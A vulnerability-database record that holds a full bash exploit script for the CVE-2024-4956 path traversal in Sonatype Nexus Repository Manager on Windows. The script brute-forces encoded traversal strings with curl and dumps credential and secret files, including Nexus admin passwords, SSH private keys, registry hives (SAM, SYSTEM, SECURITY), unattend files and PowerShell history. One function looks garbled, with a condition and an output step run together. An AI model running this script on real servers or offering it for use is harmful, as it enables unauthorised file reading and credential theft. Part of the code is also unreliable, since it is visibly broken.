{"uuid": "f1e80816-7552-4af1-89a6-0995da840b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://gist.github.com/stillbigjosh/a38ecd1d3c1e02fe2a848c4f8851565c", "content": "#!/bin/bash\n# CVE-2024-4956 - Sonatype Nexus Repository Manager Path Traversal\n# Windows backslash version\n\nRED='\\033[0;31m'\nGREEN='\\033[0;32m'\nYELLOW='\\033[1;33m'\nCYAN='\\033[0;36m'\nNC='\\033[0m'\n\n# ..\\ = ..%5C | ..\\\\ = ..%5C%5C\nTRAVERSALS=(\n # ..%5C (single backslash) - varying depths\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..\"\n # More leading slashes + ..%5C\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..\"\n # ..%5C%5C (double backslash) - varying depths\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..%5C%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..\"\n # More leading slashes + ..%5C%5C\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%5C%5C..%5C%5C..%5C%5C..%5C%5C..\"\n # Mixed: ..%5C with %2F separators in file path\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..%5C..%5C\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C\"\n # Raw dot-dot-backslash (not encoded, curl may handle it)\n \"/%2F%2F%2F%2F%2F%2F%2F..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..%00\"\n # Forward slash traversal kept as fallback\n \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n)\n\n# File paths using backslash separator (will be encoded to %5C)\nWIN_FILES_BACKSLASH=(\n # === PROOF ===\n 'Windows\\win.ini'\n 'Windows\\System32\\drivers\\etc\\hosts'\n 'Windows\\System32\\license.rtl'\n\n # === NEXUS - root install ===\n 'nexus\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'nexus\\sonatype-work\\nexus3\\admin.password'\n 'nexus\\sonatype-work\\nexus3\\etc\\nexus-default.properties'\n 'nexus\\sonatype-work\\nexus3\\log\\nexus.log'\n 'nexus\\sonatype-work\\nexus3\\etc\\fabric\\nexus-store.properties'\n 'nexus\\sonatype-work\\nexus3\\db\\security'\n 'nexus\\sonatype-work\\nexus3\\keystores\\node\\keystore.properties'\n 'nexus\\etc\\nexus-default.properties'\n 'nexus\\bin\\nexus.vmoptions'\n\n # === NEXUS - Program Files ===\n 'Program Files\\nexus\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'Program Files\\nexus\\sonatype-work\\nexus3\\admin.password'\n 'Program Files\\nexus\\sonatype-work\\nexus3\\etc\\nexus-default.properties'\n 'Program Files\\nexus\\sonatype-work\\nexus3\\log\\nexus.log'\n 'Program Files\\nexus\\sonatype-work\\nexus3\\etc\\fabric\\nexus-store.properties'\n 'Program Files\\nexus\\etc\\nexus-default.properties'\n 'Program Files\\nexus\\bin\\nexus.vmoptions'\n\n # === NEXUS - Sonatype dir ===\n 'Program Files\\sonatype\\nexus\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'Program Files\\sonatype\\nexus\\sonatype-work\\nexus3\\admin.password'\n 'Program Files\\sonatype\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'Program Files\\sonatype\\sonatype-work\\nexus3\\admin.password'\n\n # === NEXUS - standalone sonatype-work ===\n 'sonatype-work\\nexus3\\etc\\nexus.properties'\n 'sonatype-work\\nexus3\\admin.password'\n 'sonatype-work\\nexus3\\etc\\nexus-default.properties'\n 'sonatype-work\\nexus3\\log\\nexus.log'\n 'sonatype-work\\nexus3\\etc\\fabric\\nexus-store.properties'\n 'sonatype-work\\nexus3\\db\\security'\n\n # === NEXUS - flat ===\n 'nexus3\\etc\\nexus.properties'\n 'nexus3\\admin.password'\n 'nexus3\\etc\\nexus-default.properties'\n 'nexus3\\log\\nexus.log'\n\n # === SONARQUBE ===\n 'sonarqube\\conf\\sonar.properties'\n 'sonarqube\\conf\\wrapper.conf'\n 'sonarqube\\logs\\sonar.log'\n 'sonarqube\\logs\\web.log'\n 'Program Files\\sonarqube\\conf\\sonar.properties'\n 'Program Files\\sonarqube\\conf\\wrapper.conf'\n 'Program Files\\SonarQube\\conf\\sonar.properties'\n 'SonarQube\\conf\\sonar.properties'\n\n # === USERS ===\n 'Users\\Administrator\\.ssh\\id_rsa'\n 'Users\\Administrator\\.ssh\\authorized_keys'\n 'Users\\Administrator\\Desktop\\flag.txt'\n 'Users\\Administrator\\Desktop\\root.txt'\n 'Users\\Administrator\\Desktop\\proof.txt'\n 'Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt'\n 'Users\\nexus\\.ssh\\id_rsa'\n 'Users\\nexus\\Desktop\\flag.txt'\n 'Users\\sonar\\.ssh\\id_rsa'\n 'Users\\sonar\\Desktop\\flag.txt'\n 'Users\\svc_nexus\\.ssh\\id_rsa'\n 'Users\\svc_nexus\\Desktop\\flag.txt'\n 'Users\\svc_sonar\\.ssh\\id_rsa'\n\n # === SYSTEM CREDS ===\n 'Windows\\Panther\\Unattend.xml'\n 'Windows\\Panther\\unattend.xml'\n 'Windows\\Panther\\Unattended.xml'\n 'Windows\\Panther\\unattend\\Unattend.xml'\n 'Windows\\System32\\sysprep\\Unattend.xml'\n 'Windows\\System32\\sysprep\\unattend.xml'\n 'ProgramData\\unattend.xml'\n 'Windows\\repair\\SAM'\n 'Windows\\repair\\SYSTEM'\n 'Windows\\debug\\NetSetup.LOG'\n 'Windows\\System32\\inetsrv\\config\\applicationHost.config'\n 'Windows\\System32\\config\\SAM'\n 'Windows\\System32\\config\\SYSTEM'\n 'Windows\\System32\\config\\SECURITY'\n 'Windows\\System32\\config\\RegBack\\SAM'\n 'Windows\\System32\\config\\RegBack\\SYSTEM'\n\n # === IIS ===\n 'inetpub\\wwwroot\\web.config'\n 'inetpub\\wwwroot\\appsettings.json'\n)\n\n# Same paths with C:\\ prefix\nWIN_FILES_CDRIVE=(\n 'C:\\Windows\\win.ini'\n 'C:\\Windows\\System32\\drivers\\etc\\hosts'\n 'C:\\nexus\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'C:\\nexus\\sonatype-work\\nexus3\\admin.password'\n 'C:\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'C:\\sonatype-work\\nexus3\\admin.password'\n 'C:\\Program Files\\nexus\\sonatype-work\\nexus3\\etc\\nexus.properties'\n 'C:\\Program Files\\nexus\\sonatype-work\\nexus3\\admin.password'\n 'C:\\sonarqube\\conf\\sonar.properties'\n 'C:\\Program Files\\sonarqube\\conf\\sonar.properties'\n 'C:\\Users\\Administrator\\Desktop\\flag.txt'\n 'C:\\Windows\\Panther\\Unattend.xml'\n 'C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt'\n)\n\nencode_backslash_path() {\n # Encode \\ to %5C and spaces to %20\n echo \"$1\" | sed 's/\\\\/\\%5C/g; s/ /%20/g'\n}\n\nencode_forwardslash_path() {\n # Convert \\ to / then encode / to %2F and spaces to %20\n echo \"$1\" | sed 's/\\\\/\\//g; s/\\//%2F/g; s/ /%20/g'\n}\n\nencode_cdrive_path() {\n # C: becomes C%3A, \\ becomes %5C, spaces become %20\n echo \"$1\" | sed 's/C:/C%3A/g; s/\\\\/\\%5C/g; s/ /%20/g'\n}\n\ntry_fetch() {\n local url=\"$1\"\n local label=\"$2\"\n local response\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n local size=${#response}\n\n if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n return 0\n fi\n return 1\n}\n\nscan() {\n local base_url=\"$1\"\n local found=0\n local working_trav=\"\"\n local working_encode=\"\" # backslash, forwardslash, or cdrive\n\n echo -e \"${CYAN}=== CVE-2024-4956 Nexus LFI - Windows Backslash Mode ===${NC}\"\n echo -e \"${CYAN}Target: ${base_url}${NC}\"\n echo \"\"\n\n # Phase 1: Find working traversal + encoding combo\n echo -e \"${YELLOW}[*] Phase 1: Probing traversal depth & encoding with win.ini...${NC}\"\n\n for trav in \"${TRAVERSALS[@]}\"; do\n # Try backslash-encoded file path: Windows%5Cwin.ini\n url=\"${base_url}${trav}%5CWindows%5Cwin.ini\"\n resp=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$resp\" =~ \"[fonts]\" || \"$resp\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE! Backslash encoding works${NC}\"\n echo -e \"${GREEN} Traversal: ${trav}${NC}\"\n working_trav=\"$trav\"\n working_encode=\"backslash\"\n break\n fi\n\n # Try forward-slash file path: Windows%2Fwin.ini\n url=\"${base_url}${trav}%2FWindows%2Fwin.ini\"\n resp=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$resp\" =~ \"[fonts]\" || \"$resp\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE! Forward-slash encoding works${NC}\"\n echo -e \"${GREEN} Traversal: ${trav}${NC}\"\n working_trav=\"$trav\"\n working_encode=\"forwardslash\"\n break\n fi\n\n # Try C: prefix: C%3A%5CWindows%5Cwin.ini\n url=\"${base_url}${trav}%5CC%3A%5CWindows%5Cwin.ini\"\n resp=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$resp\" =~ \"[fonts]\" || \"$resp\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE! C: + backslash encoding works${NC}\"\n echo -e \"${GREEN} Traversal: ${trav}${NC}\"\n working_trav=\"$trav\"\n working_encode=\"cdrive\"\n break\n fi\n\n # C: with forward slash\n url=\"${base_url}${trav}%2FC%3A%2FWindows%2Fwin.ini\"\n resp=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$resp\" =~ \"[fonts]\" || \"$resp\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE! C: + forward-slash encoding works${NC}\"\n echo -e \"${GREEN} Traversal: ${trav}${NC}\"\n working_trav=\"$trav\"\n working_encode=\"cdrive_fwd\"\n break\n fi\n done\n\n if [[ -z \"$working_trav\" ]]; then\n echo -e \"${RED}[-] No working traversal found with win.ini probe.${NC}\"\n echo -e \"${YELLOW}[*] Brute-forcing high-value targets across all combos...${NC}\"\n\n for trav in \"${TRAVERSALS[@]}\"; do\n for filepath in \"${WIN_FILES_BACKSLASH[@]}\"; do\n encoded=$(encode_backslash_path \"$filepath\")\n try_fetch \"${base_url}${trav}%5C${encoded}\" \"[bs] ${filepath}\" && ((found++))\n\n encoded=$(encode_forwardslash_path \"$filepath\")\n try_fetch \"${base_url}${trav}%2F${encoded}\" \"[fs] ${filepath}\" && ((found++))\n\n [[ \"$found\" -gt 0 ]] && break 2\n done\n done\n\n echo -e \"${YELLOW}[*] Done. ${found} hits.${NC}\"\n return\n fi\n\n echo \"\"\n echo -e \"${YELLOW}[*] Phase 2: Dumping files (${working_encode} encoding)...${NC}\"\n echo \"\"\n\n case \"$working_encode\" in\n backslash)\n for filepath in \"${WIN_FILES_BACKSLASH[@]}\"; do\n encoded=$(encode_backslash_path \"$filepath\")\n try_fetch \"${base_url}${working_trav}%5C${encoded}\" \"$filepath\" && ((found++))\n done\n # Also try C: paths\n echo -e \"${YELLOW}[*] Phase 3: C: prefixed paths...${NC}\"\n for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n encoded=$(encode_cdrive_path \"$filepath\")\n try_fetch \"${base_url}${working_trav}%5C${encoded}\" \"$filepath\" && ((found++))\n done\n ;;\n forwardslash)\n for filepath in \"${WIN_FILES_BACKSLASH[@]}\"; do\n encoded=$(encode_forwardslash_path \"$filepath\")\n try_fetch \"${base_url}${working_trav}%2F${encoded}\" \"$filepath\" && ((found++))\n done\n ;;\n cdrive)\n for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n encoded=$(encode_cdrive_path \"$filepath\")\n try_fetch \"${base_url}${working_trav}%5C${encoded}\" \"$filepath\" && ((found++))\n done\n ;;\n cdrive_fwd)\n for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n encoded=$(echo \"$filepath\" | sed 's/C:/C%3A/g; s/\\\\/\\//g; s/\\//%2F/g; s/ /%20/g')\n try_fetch \"${base_url}${working_trav}%2F${encoded}\" \"$filepath\" && ((found++))\n done\n ;;\n esac\n\n echo \"\"\n echo -e \"${YELLOW}[*] Scan complete. ${found} files retrieved.${NC}\"\n}\n\nsingle_file() {\n local base_url=\"$1\"\n local filepath=\"$2\"\n local found=0\n\n echo -e \"${YELLOW}[*] Testing all traversals for: ${filepath}${NC}\"\n for trav in \"${TRAVERSALS[@]}\"; do\n # Backslash encoded\n encoded=$(encode_backslash_path \"$filepath\")\n try_fetch \"${base_url}${trav}%5C${encoded}\" \"[bs] $filepath\" && ((found++))\n\n # Forward slash encoded\n encoded=$(encode_forwardslash_path \"$filepath\")\n try_fetch \"${base_url}${trav}%2F${encoded}\" \"[fs] $filepath\" && ((found++))\n\n # C: backslash\n encoded=$(encode_cdrive_path \"$filepath\")\n try_fetch \"${base_url}${trav}%5C${encoded}\" \"[C:bs] $filepath\" && ((found++))\n done\n\n [[ \"$found\" -eq 0 ]] && echo -e \"${RED}[-] No hits.${NC}\"\n}\n\n# --- MAIN ---\ntarget_url=\"\"\ntarget_file=\"\"\n\nwhile getopts \"u:f:h\" opt; do\n case $opt in\n u) target_url=\"$OPTARG\" ;;\n f) target_file=\"$OPTARG\" ;;\n h) echo \"Usage: $0 -u http://TARGET:PORT [-f 'Windows\\win.ini']\"; exit 0 ;;\n *) echo \"Usage: $0 -u http://TARGET:PORT [-f 'Windows\\win.ini']\"; exit 1 ;;\n esac\ndone\n\n[[ -z \"$target_url\" ]] && { echo \"Usage: $0 -u http://TARGET:PORT [-f FILE]\"; exit 1; }\ntarget_url=\"${target_url%/}\"\n\nif [[ -n \"$target_file\" ]]; then\n single_file \"$target_url\" \"$target_file\"\nelse\n scan \"$target_url\"\nfi", "creation_timestamp": "2026-06-23T10:32:33.000000Z"}